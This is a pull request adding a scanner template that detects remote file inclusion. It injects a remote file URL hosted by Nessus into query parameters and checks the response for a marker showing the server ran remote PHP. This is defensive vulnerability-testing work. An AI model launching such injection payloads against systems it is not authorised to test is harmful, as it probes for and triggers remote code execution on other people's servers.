### PR TITLE
Adding RFI template

### DIFF
--- a/rfi/rfi.yaml
+++ b/rfi/rfi.yaml
@@ -1,0 +1,31 @@
+id: rfi
+
+info:
+  name: Remote File Inclusion
+  author: m4lwhere
+  severity: high
+  tags: rfi,dast,oast
+  reference:
+    - https://www.invicti.com/learn/remote-file-inclusion-rfi/
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    payloads:
+      rfi:
+        - "https://rfi.nessus.org/rfi.txt"
+
+    fuzzing:
+      - part: query
+        mode: single
+        fuzz:
+          - "{{rfi}}"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body  # Confirms the PHP was executed
+        words:
+          - "NessusCodeExecTest"


### PR DESCRIPTION
This PR adds a template to check for RFI vulnerabilities. This uses the Nessus RFI file to determine that the PHP code was executed by the server.

Please let me know if anything else is missing, thanks!